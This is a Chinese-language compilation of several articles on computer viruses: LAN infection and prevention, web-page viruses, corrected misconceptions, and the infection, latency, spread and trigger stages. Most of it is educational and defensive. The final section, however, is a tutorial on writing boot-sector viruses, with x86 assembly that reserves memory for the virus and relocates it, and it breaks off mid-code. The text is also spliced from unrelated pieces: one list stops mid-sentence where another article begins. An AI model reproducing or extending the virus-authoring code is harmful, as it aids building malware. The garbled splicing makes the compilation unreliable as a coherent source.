局域网病毒入侵原理、现象及防范方法

一、局域网病毒入侵原理及现象
 
一般来说,计算机网络的基本构成包括网络服务器和网络节点站(包括有盘工作站、无盘工作站和远程工作站)。计算机病毒一般首先通过各种途径进入到有盘工作站,也就进入网络,然后开始在网上的传播。具体地说,其传播方式有以下几种。
(1)病毒直接从工作站拷贝到服务器中或通过邮件在网内传播;
(2)病毒先传染工作站,在工作站内存驻留,等运行网络盘内程序时再传染给服务器;
(3)病毒先传染工作站,在工作站内存驻留,在病毒运行时直接通过映像路径传染到服务器中;
(4)如果远程工作站被病毒侵入,病毒也可以通过数据交换进入网络服务器中。
 
一旦病毒进入文件服务器,就可通过它迅速传染到整个网络的每一个计算机上。而对于无盘工作站来说,由于其并非真的”无盘”(它的盘是网络盘),当其运行网络盘上的一个带毒程序时,便将内存中的病毒传染给该程序或通过映像路径传染到服务器的其他的文件上,因此无盘工作站也是病毒孽生的温床。
 
由以上病毒在网络上的传播方式可见,在网络环境下,网络病毒除了具有可传播性、可执行性、破坏性等计算机病毒的共性外,还具有一些新的特点。
(1)感染速度快
在单机环境下,病毒只能通过介质从一台计算机带到另一台,而在网络中则可以通过网络通讯机制进行迅速扩散。根据测定,在网络正常工作情况下,只要有一台工作站有病毒,就可在几十分钟内将网上的数百台计算机全部感染。
(2)扩散面广
由于病毒在网络中扩散非常快,扩散范围很大,不但能迅速传染局域网内所有计算机,还能通过远程工作站将病毒在一瞬间传播到千里之外。
(3)传播的形式复杂多样
计算机病毒在网络上一般是通过”工作站”到”服务器”到”工作站”的途径进行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。
(4)难于彻底清除
单机上的计算机病毒有时可以通过带毒文件来解决。低级格式化硬盘等措施能将病毒彻底清除。
而网络中只要有一台工作站未能清除干净,就可使整个网络重新被病毒感染,甚至刚刚完成杀毒工作的一台工作站,就有可能被网上另一台带毒工作站所感染。因此,仅对工作站进行杀毒,并不能解决病毒对网络的危害。
(5)破坏性大
网络病毒将直接影响网络的工作,轻则降低速度,影响工作效率,重则使网络崩溃,破坏服务器信息,使多年工作毁于一旦。
(6)可激发性
网络病毒激发的条件多样化,可以是内部时钟、系统的日期和用户名,也可以是网络的一次通信等。一个病毒程序可以按照病毒设计者的要求,在某个工作站上激发并发出攻击。
(7)潜在性

网络一旦感染了病毒,即使病毒已被清除,其潜在的危险性也是巨大的。根据统计,病毒在网络上被清除后,85%的网络在30天内会被再次感染。
例如尼姆达病毒,会搜索本地网络的文件共享,无论是文件服务器还是终端客户机,一旦找到,便安装一个隐藏文件,名为Riched20.DLL到每一个包含”DOC”和”eml”文件的目录中,当用户通过Word、写字板、Outlook打开”DOC”和”eml”文档时,这些应用程序将执行Riched20.DLL文件,从而使机器被感染,同时该病毒还可以感染远程服务器被启动的文件。带有尼姆达病毒的电子邮件,不需你打开附件,只要阅读或预览了带病毒的邮件,就会继续发送带毒邮件给你通讯簿里的朋友。
 
二、局域网病毒防范方法
 
以”尼姆达”病毒为例,个人用户感染该病毒后,使用单机版杀毒软件即可清除;然而企业的网络中,一台机器一旦感染”尼姆达”,病毒便会自动复制、发送并采用各种手段不停交叉感染局域网内的其他用户。
计算机病毒形式及传播途径日趋多样化,因此,大型企业网络系统的防病毒工作已不再像单台计算机病毒的检测及清除那样简单,而需要建立多层次的、立体的病毒防护体系,而且要具备完善的管理系统来设置和维护对病毒的防护策略。
一个企业网的防病毒体系是建立在每个局域网的防病毒系统上的,应该根据每个局域网的防病毒要求,建立局域网防病毒控制系统,分别设置有针对性的防病毒策略。

(1)增加安全意识
杜绝病毒,主观能动性起到很重要的作用。病毒的蔓延,经常是由于企业内部员工对病毒的传播方式不够了解,病毒传播的渠道有很多种,可通过网络、物理介质等。查杀病毒,首先要知道病毒到底是什么,它的危害是怎么样的,知道了病毒危害性,提高了安全意识,杜绝毒瘤的战役就已经成功了一半。平时,企业要从加强安全意识着手,对日常工作中隐藏的病毒危害增加警觉性,如安装一种大众认可的网络版杀毒软件,定时更新病毒定义,对来历不明的文件运行前进行查杀,每周查杀一次病毒,减少共享文件夹的数量,文件共享的时候尽量控制权限和增加密码等,都可以很好地防止病毒在网络中的传播。
(2)小心邮件
随着网络的普及,电子信箱成了人们工作中不可缺少的一种媒介。它方便快捷在提高了人们的工作效率的同时,也无意之中成为了病毒的帮凶。有数据显示,如今有超过90%的病毒通过邮件进行传播。
尽管这些病毒的传播原理很简单,但这块决非仅仅是技术问题,还应该教育用户和企业,让它们采取适当的措施。例如,如果所有的Windows用户都关闭了VB脚本功能,像库尔尼科娃这样的病毒就不可能传播。只要用户随时小心警惕,不要打开值得怀疑的邮件,就可把病毒拒绝在外。
(3)挑选网络版杀毒软件
选择一个功力高深的网络版病毒”杀手”就至关重要了。一般而言,查杀是否彻底,界面是否友好、方便,能否实现远程控制、集中管理是决定一个网络杀毒软件的三大要素。

网页病毒的概念

     1、什么是网页病毒?
   它主要是利用软件或系统操作平台等的安全漏洞,通过执行嵌入在网页HTML超文本标记语言内的Java Applet小应用程序,JavaScript脚本语言程序,ActiveX软件部件网络交互技术支持可自动执行的代码程序,以强行修改用户操作系统的注册表设置及系统实用配置程序,或非法控制系统资源盗取用户文件,或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。
 
   2、网页病毒的性质及特点:
   这种非法恶意程序能够得以被自动执行,在于它完全不受用户的控制。你一旦浏览含有该病毒的网页,即可以在你不知不觉的情况下马上中招,给用户的系统带来一般性的、轻度性的、严重恶性等不同程度的破坏。令你苦不堪言,甚至损失惨重无法弥补。 网页病毒的种类
   根据目前互联网上流行的常见网页病毒的作用对象及表现特征,归纳为以下两大种类:
 
   一、通过Java Script、Applet、ActiveX编辑的脚本程序修改IE浏览器:
   1.默认主页被修改;
   2.默认首页被修改;
   3.默认的微软主页被修改;
   4.主页设置被屏蔽锁定,且设置选项无效不可改回;
   5.默认的IE搜索引擎被修改;
   6.IE标题栏被添加非法信息
   7.OE标题栏被添加非法信息;
   8.鼠标右键菜单被添加非法网站广告链接;
   9.鼠标右键弹出菜单功能被禁用失常;
   10.IE收藏夹被强行添加非法网站的地址链接;
   11.在IE工具栏非法添加按钮;
   12.锁定地址下拉菜单及其添加文字信息;
   13.IE菜单“查看”下的“源文件”被禁用;
 
   二、通过Java Script、Applet、ActiveX编辑的脚本程序修改用户操作系统:
   1.开机出现对话框;
   2.系统正常启动后,但IE被锁定网址自动调用打开;
   3.格式化硬盘
   4.暗藏“万花谷”蛤蟆病毒,全方位侵害封杀系统,最后导致瘫痪崩溃;
   5.非法读取或盗取用户文件;
   6.锁定禁用注册表;
   7.注册表被锁定禁用之后,编辑*.reg注册表文件打开方式错乱;
   8.时间前面加广告;
   9.启动后首页被再次修改;
   10.更改“我的电脑”下的一系列文件夹名称。

纠正14条查杀电脑病毒的错误认识

1、对染毒软盘DIR操作会导致硬盘被感染(错)
 
如果计算机的内存没有病毒,那么只有在执行了带有病毒的程序(文件)后,才会感染计算机。而DIR命令是DOS的内部命令,不需要执行任何外部的程序(文件),因此对染毒软盘进行DIR操作不会感染病毒。
不过需要注意的是,如果计算机内存已有病毒(或者说计算机已染毒),如果对没有染毒的软盘进行DIR操作, 就可能感染软盘。说可能会感染是因为有些病毒不会通过DIR操作传播。
 
2、将文件改为只读方式可免受病霉的感染(错)
 
某些人认为通过DOS的外部命令ATTRIB,将文件设置为只读会十分有效地抵御病毒。 其实修改一个文件的属性只需要调用几个DOS中断就可以了,因此说ATTRIB命令对于阻止病毒的感染及传播几乎无能为力。
 
3、病毒能感染写保护的磁盘(错)
 
由于病毒可感染只读文件,不少人由此认为病毒也能修改在写保护磁盘上的文件。事实上,磁盘驱动器可以判断磁盘是否写保护,是否应该对其进行写操作,这一切都是由硬件来控制的,您可以物理地解除PC的写保护传感器,却不能用软件来做这件事。
如果您的软驱是正常的,而软盘的写保护一次也没有取下来,绝对不会感染病毒。但是如果您取下来了,并且用带毒的机器DIR过,则完全有可能感染病毒。注意这个DIR是从机器向软盘感染病毒,而不是把病毒从软盘传染到机器。
 
写保护和文件只读方式不同,设置文件只读方式是通过计算机,所以病毒能插上一手,可是写保护非要人手参与不可,病毒可没办法把写保护弄掉。计算机不能对写保护磁盘进行改写,这是任何操作都无法改变的(除非您把驱动器弄坏)。
 
4、反病毒软件能够杀除所有已知病毒(错)
 
病毒感染方式很多,有些病毒会强行覆盖执行程序的某一部分,将自身代码嵌入其中,以达到不改变被感染文件长度的目的,被这样的病毒覆盖掉的代码无法复原,因此这种病毒是无法安全杀除的。 病毒破坏了文件的某些内容, 在杀除这种病毒后是不能恢复文件的原貌的。
 
 5、使用杀毒软件可以免受病毒的侵扰(错)
 
目前市场上出售的杀毒软件,都只能在病毒泛滥之后才“一展身手”。但在杀毒之前病毒已经造成了工作的延误、数据的破坏或其他更为严重的后果。所以,应该选择一套完善的反毒系统,它不仅应包括常见的查、杀病毒功能,还应该同时包括有实时防毒功能,能实时地监测、跟踪对文件的各种操作,一旦发现病毒,立即报警,只有这样才能最大程度地减少被病毒感染的机会。

 6、磁盘文件损坏多为病毒所为(错)
 
文件的损坏有多种原因,电源电压波动、掉电、磁化、磁盘质量低劣、硬件错误、其他软件中的错误、灰尘、烟灰、茶水,甚至一个喷嚏都可能导致数据丢失。以上所举对文件造成的损坏,会比病毒造成的损失更常见,更严重。
 
7、如果做备份的时候,备份了病霉,那么这些备份是无用的(错)
 
有两种情况:①软盘备份:备份中含有引导型病毒。这种情况下,只要不用这张软盘试图启动您的计算机,它将和无毒备份一样安全。②磁带备份:备份中的数据文件中不会有病毒,如果其中的可执行文件中含有病毒,那么执行文件就白备份了,但是备份中的数据文件还是可用的。
 
8、反病毒软件可以随时随地防范任何病霉(错)
 
很显然,这种反病毒软件是不存在的。新病毒不断出现,要求反病毒软件必须快速升级。对抗病毒,我们需要的是一种安全策略和一个完善的反病毒系统,用备份作为防病毒的第一道防线,将反病毒软件作为第二道防线。 同时,软件的及时升级是加固第二道防线的唯一方法。使用反病毒软件是为了辅助防毒,它不可能是刀枪不入的保镖。
 
9、正版软件不会带病毒,可以安全使用(错)
 
计算机用户常被告知,“为了防范病毒的侵害,不要使用来历不明的软件”。这话不错,所谓“来历不明的软件”确实是计算机病毒传播主要途径之一。那么使用有“来历”的软件是否就可以高枕无忧呢?非也!实际上计算机报刊媒体已经多次报导过“正版软件”。“商品软件”带病毒问题。使用商品软件也不可掉以轻心,甚至新购买的计算机包括
 
原装计算机在使用前都须进行病毒检测。如确实由于原版软件带有病毒而造成重大的损失,应寻求法律保护。
不用软盘,不会感染病毒,因而无需选择杀毒软件
 
“不用软盘,就不会感染病毒”是常在初级用户中听到的一种言论,它和“使用软盘,就会感染病毒”是一对孪生姊妹,是两种相同类型的错误论调。
 
病毒的传染是通过带病毒软件进行的,但软盘并不是“带病毒软件”的唯一载体。可以说,凡是可以得到程序(软件)的地方,都可能“得到”病毒。也就是说,使用光盘、硬盘、磁带,或者通过局域/广域网络、Internet、BBS(电子公告板)使用或下载软件,都潜在感染病毒的危险。尤其是近年来 Internet和BBS的广泛使用,使得国内外病毒大面积、高速度的流行传播成为可能。这些具有国际性的计算机信息传播媒体,是潜在的病毒毒源和导管(当然,这些网络体系中也具有安全性较高的防/杀病毒系统),使每一个计算机用户都受到染毒的威胁。 —恐怕没有人会说他的计算机永远不会连上Internet。
 
人不可能不生病,所以计算机绝不可能不感染病毒,所以您必须选择杀毒软件。
 
人不可能都是医生,所以您没有必要独自去面对病毒,所以您必须选择杀毒软件。
 
 10、“能杀毒的就行”和“有一个杀毒软件就够了”(错)
 
“能杀毒的就行”和“有一个杀毒软件就够了”,这是一部分人在选择杀毒软件时的想法。一种常见的情况是,当您的计算机不正常时,找来一大堆杀毒软件,不管是正版还是盗版,能查能杀病毒就是好样的。其实很多计算机的故障并不是病毒导致,这样,很多的杀毒软件都“无效”;另一种更常见的情况是用户一般并不注意“查毒”与“杀毒”的区别,使用某种杀毒软件时,首选“杀毒”操作。于是,当它用这种杀毒软件将系统“杀毒”了一次以后,用其他杀毒软件,就再也找不到病毒了,那就认定这个软件是最好的。
 
目前还没有一个杀毒软件能囊括所有病毒而杀之,这是谁也做不到的。由于各种病毒标本的来源不同,再加上程序编制者的实力有别,总存在一种软件能查杀的病毒,别的软件却不能查杀。或者由于一些程序BUG(程序错误),使某些软件本来可以查杀的病毒,在它的一些版本中却不能查杀或误查误杀了。所以一般不建议用户革一的选择一种杀毒软件。
 
在选择杀毒软件时,请首先抛开您所有关于“好”与“不好”的成见,也拒绝广告词上的种种诱惑,认真地去了解一下杀病毒软件厂商在技术实力、服务质量、软件性能等方面的东西。特别应该了解软件厂商在升级、退货、损坏更换等方面的措施和承诺的可信度。同时,您应该请厂商直接阐述一下他们在广告中的各种术语的具体含义,要知道,这是您作为消费者的合法权益。
 
现在的反病毒软件市场就像“战国时代”,各家都说各家好。但消费者感到不放心,到底用谁的软件好?只用一个好还是用几个好?世上没有“万灵丹”,一个软件再好,也不是所有的病毒都能杀,不能“包治百病”。各软件厂家获取病毒样本的时间不同,因此,在每一个时间段,各软件厂家都是各有侧重,只有一个不保险。除了“万能的主”之外,这个世界上恐怕再也找不到万能的东西了。为防止“重复建设”,专家认为,选购两个优势互补的反病毒软件即可,这是提高“安全系数”的最佳方法。千万别把好几个反病毒软件都在同一台计算机上安装,大多了没必要,而且有可能出现相互之间抢占资源、判断失误、死机等问题。
 
11、发现CMOS中有病毒(错)
 
CMOS是微机中的一种特殊存储器,记录了微机的硬件设置参数及系统日期时间。开机密码等重要数据。由于CMOS设置十分重要,所以可能成为计算机病毒破坏攻击的目标。目前确实已发现了改写CMOS的“CMOS设置破坏者”病毒,但在CMOS中并不存在病毒。
有时,机器发生问题,问题出在CMOS设置上,有人认为,这是躲藏在CMOS里面的病毒!因而误认为杀毒软件不行,采取对CMOS存储器又是放电、又是短路的措施,重新设置CMOS参数后,机器恢复了正常,从此确信CMOS中有病毒。这种行为及其危险,很容易将主板搞坏。我们说“CMOS设置破坏者病毒,不等于CMOS中有病毒!病毒不能将自身自动传染到CMOS里面而存留和被激活!”,“病毒可以将CMOS设置改变或加密,但用户也可以重新设置和恢复。”
 
某些情况下,如CMOS电源不足、外界电源冲击性波动、软件崩溃、硬件不稳定、操作上的失误、病毒改写等都会导致CMOS 设置紊乱,也可以说,是紊乱性加密,因而,造成机器不能引导或不能正常工作。这时,一般情况下可以重新对CMOS设置和用专用软件来清理紊乱性密码,然后再设置正确参数。
 
CMOS中不会有病毒寄生,因为:
 
(1)CMOS是通过I/O读写与CPU交换数据的, CPU的物理机能决定了只能读写CMOS的数据,不能把CMOS中的数据当作指令代码来执行。而病毒想要工作的话就一定要执行其程序码,但CMOS只是用来存放数据的,在CMOS中的数据不是可执行的,所以并没有CMO5病毒,只有会破坏CMOS数据的病毒。
 
(2)如果把一段病毒程序写入CMOS,则必然破坏微机的硬件设置以至于微机根本不能运行,存储在CMOS中的“病毒程序”将毫无作用,病毒不能在CMOS中蔓延或藏身于其中。
 
(3)CMOS的有效存储容量只有128个字节,不足以容纳病毒。可见CMOS不具备病毒寄生和被激活的条件,不可能有病毒存在。
 
12、发现Cache中有病毒
 
与CMOS中没有病毒一样,Cache中也是根本不可能存在病毒的。
我们知道,程序执行时,数据流是这样被传送的:
 
外存(软/硬盘) 

PC病毒原理:感染-潜伏-繁殖-发作

    听到“计算机病毒”时,也许不少人会漠然地说:不就是一些侵入个人电脑中干坏事的程序嘛!
  最近像“蠕虫”和“特洛伊木马”之类的病毒术语几乎都成了普通电脑用户的口头禅了。下面就让我们从这些术语的含义开始了解一下计算机病毒。
“计算机病毒”的起源
  “计算机病毒”这种说法起源于美国弗雷德里克·B·科恩(Frederick B.Cohen)博士于1984年9月在美国计算机安全学会上发表的一篇论文(当时他还是美国加利弗尼亚大学研究生院的一名学生)。在这篇论文中,科恩首次把“为了把自身的拷贝传播给其他程序而修改并感染目标程序的程序”定义为“计算机病毒”。这就是计算机病毒的原始含义。
  在电视和杂志等报道中,绝大多数则把所有的非法程序统称为病毒。但是,计算机病毒专家至今仍尊重科恩博士当时的定义。因此笔者在本文将把寄生于其他程序中的程序称为病毒,而把人们一般所说的病毒称为“非法程序”。本文将对狭义上所讲的病毒以及非法程序的整个运行机制进行详细探讨。
自我繁殖的蠕虫

   按照非法程序的行动来划分,大体上可以分为病毒、蠕虫和特洛伊木马这三大类。
  蠕虫是指具有通过网络进行自我繁殖功能的程序。比如,随意利用邮件软件等应用程序向其他个人电脑发送含有自身拷贝的电子邮件。其代表是1999年年初首次出现、并在日本造成了巨大损失的“幸福99(Happy99)”蠕虫。
  最近有人说“病毒危害急剧增加的原因在于电子邮件的普及”,这句话只讲对了一半。从严格意义来讲应该说“其原因在于电子邮件的普及以及通过邮件繁殖的蠕虫的增加”。
伪装成正规软件的特洛伊木马
  特洛伊木马是指伪装成游戏和应用程序等正规程序的非法程序。其性质与狭义上所讲的病毒存在本质区别。特洛伊木马是单独运行的非法程序,不像病毒那样感染其他程序。
  另外,有的非法程序具有上述三类中的两类以上的性质。比如“兼具蠕虫功能的病毒”等。
病毒形态可分为4个阶段。不过,根据不同的病毒,有的可能不存在某个阶段,或者多个阶段同时并进
病毒形态可分为4个阶段
  下面笔者即将开始向大家说明病毒(非法程序)的本来面目。在此之前,首先向大家介绍一下非法程序的运行机理。
  典型的病毒运行机制可以分为(1)感染、(2)潜伏、(3)繁殖和(4)发作4个阶段。
(1)感染是指病毒自我复制并传播给其他程序;
(2)潜伏是指病毒等非法程序为了逃避用户和防病毒软件的监视而隐藏自身行踪的行为;
(3)繁殖是非法程序不断地由一部计算机向其他计算机进行传播的状态;
(4)发作是非法程序所实施的各种恶意行动。

    第一阶段:感染
结果是寄生到其他程序中
  在详细说明感染机理前,首先看一下感染途径。因为如果不了解病毒是如何进入到个人电脑的,就无法往下进行。
9成以上是通过电子邮件感染的
  病毒主要通过(1)电子邮件、(2)外部介质、(3)下载这3种途径入侵个人电脑。
  (1)电子邮件,是指把蠕虫和特洛伊木马本身以及受病毒感染的文件作为电子邮件附件等发送出去。有的是普通用户在不知道附件已经感染病毒的情况下发送了病毒邮件,有的是蠕虫本身自动地向外界发送邮件。而特洛伊木马则是由图谋不轨的第三者(即黑客)发送的。
  而且受病毒感染的不仅仅限于附件。比如,Windows附带的Outlook Express等常用电子邮件软件,大多都会利用Web浏览器的功能,解释并显示邮件正文中所描述的HTML代码。而病毒脚本往往就隐藏在HTML邮件当中。
  (2)外部介质,是指用户从别人那里借来带有病毒的软盘和光盘等介质后,病毒就会由这些介质入侵到自己的电脑中。尽管很多情况是由于从别人那里借来的软盘等介质中带有病毒而被感染,但也不完全如此,过去就曾发生过多起市售软件中含有病毒的情况。
  另外,通过外部介质的感染并不仅限于通过软盘和硬盘上的文件进行感染。有些病毒会隐藏在软盘和硬盘的起动区域中,这种情况稍后会作详细介绍。如果利用这种带病毒的外部介质起动个人电脑,就会受到病毒感染。
  (3)下载,是指用户从Web站点和FTP服务器中下载感染了特洛伊木马和病毒的文件。公司内部LAN上的文件服务器和不同电脑之间的文件共享都有可能成为感染病毒的原因。
  另外,在第三种感染途径中还存在极少数特殊情况。比如,99年曾在业界引起轩然大波的“Worm.ExploreZip”病毒,只要LAN上的其他个人电脑把起动系统的分区设置为完全共享,该病毒就会随意地发送自身的拷贝并实施感染。也就是说,即便电脑用户不进行下载,电脑也会自动下载并运行病毒。
  在这三种感染途径中,所占比例最大的是电子邮件。据受理日本国内病毒相关损失情况报告的日本信息处理振兴事业协会(IPA)表示,最近9成以上都是通过电子邮件感染的。就在数年前绝大多数还都是通过外部介质感染,由此可以看出电子邮件的普及对病毒感染造成了多么大的影响。也就是说病毒和电子邮件之间存在一种息息相关的关系。
感染目标有3个
  不过,即便病毒通过上述三种途径进入了个人电脑,也不会直接产生什么问题。只有在用户无意中打开了电子邮件附件、执行了病毒程序那一刻起才会引发感染。这一点非常重要,请读者务必谨记。
  用户一旦不慎起动病毒,感染即随之开始。根据病毒感染的不同目标,大体上可以把病毒分为如下3种:
  ·引导区感染型:
    感染硬盘和软件中保存起动程序的区域
  ·可执行文件感染型:
    感染扩展名为.com和.exe等程序(可执行文件)
  ·脚本感染型:
    感染微软Office产品(Word等)的文档文件和HTML文件等
 
下面依次对这3种病毒加以介绍。
 
在个人电脑起动时同时开始运行
  首先来看一下引导区感染型病毒(图4)。此类病毒感染软盘和硬盘的引导扇区(起动区域)。
  引导扇区是指在个人电脑起动的初始状态下被访问的特殊区域,该区域保存了起动电脑所需的小程序。在硬盘中称为主引导记录(MBR)。引导区感染型病毒就感染这些小程序。病毒感染引导扇区后,在操作系统起动之前病毒就会被读入内存,并由CPU执行。在这种状态下只要在电脑中插入其他软盘等外部介质,就会一个不落地感染所使用的软盘。
   随意更改可执行文件
  接下来谈谈可执行文件感染型病毒。顾名思义,可执行文件感染型病毒只感染文件扩展名为.com和.exe等的可执行文件。下面以Windows程序为倒,介绍一下可执行文件感染型病毒的感染机理。
  感染机理其实非常简单。用户无意间运行了病毒程序后,病毒就开始查找保存在个人电脑中的其他程序文件,并实施感染。如果是可感染文件,病毒就会随意地更改此文件,并把自身的病毒代码复制到程序中。更改文件的方法包括(A)覆盖感染型、(B)追加感染型、(C)插空感染型三种方式。
用病毒代码进行更改
  对于Windows程序文件,基本上来讲描述整个文件尺寸和程序代码起始位置等信息的文件头位于文件的起始部位,在其之后为程序代码。
  覆盖感染型病毒是指用自身的病毒代码覆盖文件的程序代码部分。由于只是单纯利用病毒代码进行覆盖,因此感染机理最为简单。
  不过,感染这种病毒后,程序文件就被破坏,无法正常工作。也就是说用户受感染后,原来的程序将不能运行,而只能起动病毒程序。结果,即便用户不能马上明白是不是病毒,也会立刻注意到发生了异常情况。
感染后原程序仍然工作
  比覆盖感染型更巧妙一些的是追加感染型病毒。
  此类病毒并不更改感染对象的程序代码,而是把病毒代码添加到程序文件最后。另外,追加感染型病毒还会更改原程序文件的文件头部分。
  具体来说就是把文件头中原来记述的“执行开始地址为XXX(原程序的开头)”等信息更改变成“执行开始地址为ZZZ(病毒程序的开头)”。这样一来,在原程序运行之前,病毒代码就会首先被执行。
  另外,在病毒代码的最后会描述一段代码,以便重新回到执行原程序的开始地址。这样一来,受感染程序在执行了病毒代码之后,就会接着执行原程序。
  结果,由于原程序会正常运行,用户很难察觉到已经感染了病毒。不过,程序受到追加感染型病毒的感染后,其文件尺寸会变得比原文件大。
  最后来看一下插空感染型病毒。这种病毒可以说是由追加感染型病毒发展而来的。事实上,它并不是在程序文件中查找合适的部位,然后把程序代码等信息添加到文件中,而是查找没有实际意义的数据所在的位置。插空感染型病毒找到这些部分以后,就把自身的代码覆盖到这些部分中。结果,尽管原程序照常运行,且文件尺寸也没有任何变化,但是仍能产生感染病毒的文件。
  不过,此类病毒进行感染的前提条件是感染对象文件必须具有足够的空间。所以,它无法感染没有足够空间的程序文件。
感染数据的宏病毒
   病毒不仅感染可执行文件,还可感染数据文件。这就是宏病毒等“脚本型病毒”。脚本型病毒的感染机理如下。
  用户打开带有病毒的数据文件后,该数据文件相关联的应用程序就会执行数据文件中描述的脚本。由此就会起动病毒,然后把自身的脚本添加(或覆盖)到其他数据文件中,进行感染。
   由于这种脚本型病毒并不感染可执行文件,而感染数据文件,因此也许会让人感觉与可执行文件感染型病毒区别很大。但实际上并没有太大的区别。虽说感染的是数据文件,但该数据文件最终还是含有可由某些特定应用程序来执行的程序代码的文件。最关键的是,在病毒运行过程中总体上是作为程序来运行的,因此在这个意义上来讲,与可执行文件感染型病毒在本质并没有任何区别。
  “宏病毒感染标准模板”就是一个能真实反映这种病毒特点的例子。比如感染Word文档的宏病毒,不仅感染用户生成的数据文件,有时还会感染Word起动时最先调用的标准模板这一特别文件。结果,每当Word应用程序起动时,就会运行宏病毒,每当打开和保存Word文档文件时,就会不断感染其他文档文件。也就是说,就好象病毒感染了Word应用程序本身一样。
 
    第二阶段:潜伏—-实施掩盖和伪装
  在第二阶段即潜伏过程中需要了解的内容是,病毒是如何为躲避用户和防病毒软件的侦察而进行隐藏的。通过与防病毒软件之间不断地“斗智斗勇”,有的病毒已经逐渐具备了非常高级的隐身法。最具代表性的潜伏方法是隐蔽和自我变异。
尺寸上作假,逃避监视
  隐蔽法是指为病毒为了已经隐藏文件已感染病毒的事实,向用户和防病毒软件提供虚假文件尺寸。比如,用户运行受病毒感染的文件后,病毒不仅会感染其他文件,还常驻内存并开始监视用户操作。如果用户运行文件列表显示等命令查看文件尺寸时,病毒就会代替操作系统提供虚假信息。
如果在第一阶段中介绍的追加感染型病毒采用这种方法,用户就很难察觉已经受到病毒感染。也就是说以文件尺寸的变化为线索分析感染情况会变得相当困难。
通过伪装躲避追踪
  另一个潜伏方法即自我变异是指病毒通过实际改变自身的形态,来主要逃避防病毒软件的检测。尽管在第二部分已经进行了详细说明,笔者在这里再解释一遍,防病毒软件为了检测病毒,首先会提取病毒特征代码,然后通过比较文件和病毒特征代码来查找病毒感染情况。
  也就是说这种方法是指病毒通过采取某些措施,由于在每次感染时都会改变自身形态(病毒特征代码),因此即便与防病毒软件掌握的特征代码相对照,也不会被发现。另外,也有人把此类病毒称为变形病毒。
  还有一种比自我变异更高级的方法即“加密法”,指每次感染时先对自身进行加密,然后把还原程序及加密密钥嵌入到感染的对象文件中。如果此类病毒准备了大量的加密密钥,那么由于每次感染时就会变成不同的数据,因此防病毒软件就很难发现。
  为了防止被破解,加密过程越复杂、加密时就越要花费更多的时间。也就是说,加密法越复杂,不仅越容易被用户察觉,而且病毒自身的感染速度也变得越慢。不过最近的个人电脑性能已经很高,进行这种处理根本不算是什么负担。
 
    第三阶段:繁殖—-通过网络传播
  就像在感染阶段那部分所提到的那样,最近病毒主要通过电子邮件入侵个人电脑。将电子邮件用作传播媒介的就是蠕虫。
  实际上,最近发生的大规模病毒感染事件基本上都与蠕虫分不开。为了了解这些事件的真相,下面首先说明一下蠕虫繁殖的机理。
随意假借邮件软件实施传播
  首先以最具代表性的Windows蠕虫为例,说明一下蠕虫繁殖的过程(图8(点击放大))。比如99年春出现的、仅在数日内就有数万台甚至数十万部个人电脑被感染的梅莉莎蠕虫(也称为W97M.、Melissa.A)。
  梅莉莎蠕虫属于感染Word文档文件的宏病毒,会作为电子邮件附件发送给用户。用户一旦打开(运行)该附件,在感染Word的同时,也开始作为蠕虫进行繁殖。
  具体来说,该蠕虫会随意使用Word宏功能,起动电子邮件软件Outlook,然后把包括自身拷贝的Word文档文件添加到电子邮件中,并发送给Outlook地址薄中登记的前50个邮件地址。
  也就是说,即便用户并没有与别人交换软盘之类的存储媒介,该蠕虫也会为所欲为地把自身拷贝发送给其他用户并进行繁殖。
完全自动的UNIX蠕虫
  最近出现的蠕虫基本上都像梅莉莎蠕虫一样通过电子邮件软件进行繁殖。但还有其他类型的蠕虫。这就是主要在UNIX系统中繁殖的蠕虫,此类蠕虫曾经是蠕虫的主流品种。
  为数众多的UNIX蠕虫的最大特点是:完全自动地通过网络进行繁殖。像梅莉莎这样的使用电子邮件进行繁殖的蠕虫虽然能够向其他电脑发送自身拷贝,但此后就只能等着电脑用户去运行附件了。而UNIX蠕虫则不需用户进行任何操作即可进行繁殖。
  之所以能如此,是因为UNIX机器基本上都是作为服务器来使用。也就是说由于运行了服务器软件,因此利用服务器软件的安全漏洞,由外部发送并运行蠕虫。
  我们来具体地看一下其繁殖过程。UNIX蠕虫首先在合适的IP地址范围内,查找正在运行具有某种特定安全漏洞的服务器软件的UNIX机器。然后一旦找到符合条件的服务器,就会利用服务器软件的安全漏洞由外部执行命令,向服务器内部发送自身拷贝。紧接着再运行所发送的蠕虫。
 
    第四阶段:发作—-没有病毒不能做的事情
  最后一个阶段是发作。对于发作,笔者最想强调的是“病毒在个人电脑中什么事都可以干得出来”。病毒既然是在个人电脑上运行的程序,就绝不存在“因为是病毒,所以可以干这个”和“蠕虫干不了这个”的说法。
破坏程度因人而异
  下面就具体说明病毒发作后会产生什么情况,以及根据用户遭受的损失来介绍一下其典型症状。
  如果把破坏程度分为3个等级,那么破坏程度最大的大概就算是“格式化硬盘”和“删除文件”等直接破坏行为了。尤其是“破坏电脑BIOS”的发作症状,由于电脑将不能起动,用户自行进行修复根本无从谈起,在经济上的损失非常大。
  除这种直接破坏行为以外,“改写文件”、“大量发送邮件”、“显示信息”和“占用内存”等症状会因病毒不同而千差万别。也有不发作的病毒。
  什么样的症状对应何种程度的危险,上述所说的只是一般的标准。
  对于病毒的发作,还有另一个容易让人误解的地方。这就是指,“包括宏病毒在内的脚本病毒,由于它只在相应的应用程序等封闭的环境中运行,因此即使发作也不会产生影响到整个电脑的巨大损失”。
  其实这是大错特错的。微软Offic产品的宏语言等被病毒视为攻击对象的脚本语言大都能够超越应用程序的范围而进行操作。比如,删除系统文件也只需利用数行代码即可轻松完成。

引导型病毒编制方法

        引导形病毒指驻留在硬盘的主引导分区或硬软盘的 DOS 引导分区的病毒。由于 pc 开机后,会先执行主引导分区的代码,因此病毒可以获得第一控制权,在引导 DOS 操作系统之前,作完以下事情:
a. 减少dos可用最大内存量,以供己需;如:
     xor ax,ax
     mov ss,ax
     mov sp,7c00h
     mov ds,ax
     mov ax,word ptr ds:[413h] ; here store largest mem 0000:0413
     sub ax,2         ; apply 2k mem for virus
     mov ds:[413h],ax
b. 修改必要的中断向量,以便传播;
c. 读入病毒的其它部分,进行病毒的拼装(在内存高端);
        先从已标记的簇中某扇区读入病毒的其他部分,这些簇往往被标记为坏簇,(但是文件型病毒则不必如此,二者混合型亦然)然后再读入原引导记录到0000:7c00h,跳转执行。代码如下:     mov cl,06h
     shl ax,cl    ; ax = 8F80
     add ax,0840h  ; ax = 97c0
     mov es,ax
     mov si,7c00h  ; si = 7c00
     mov di,si
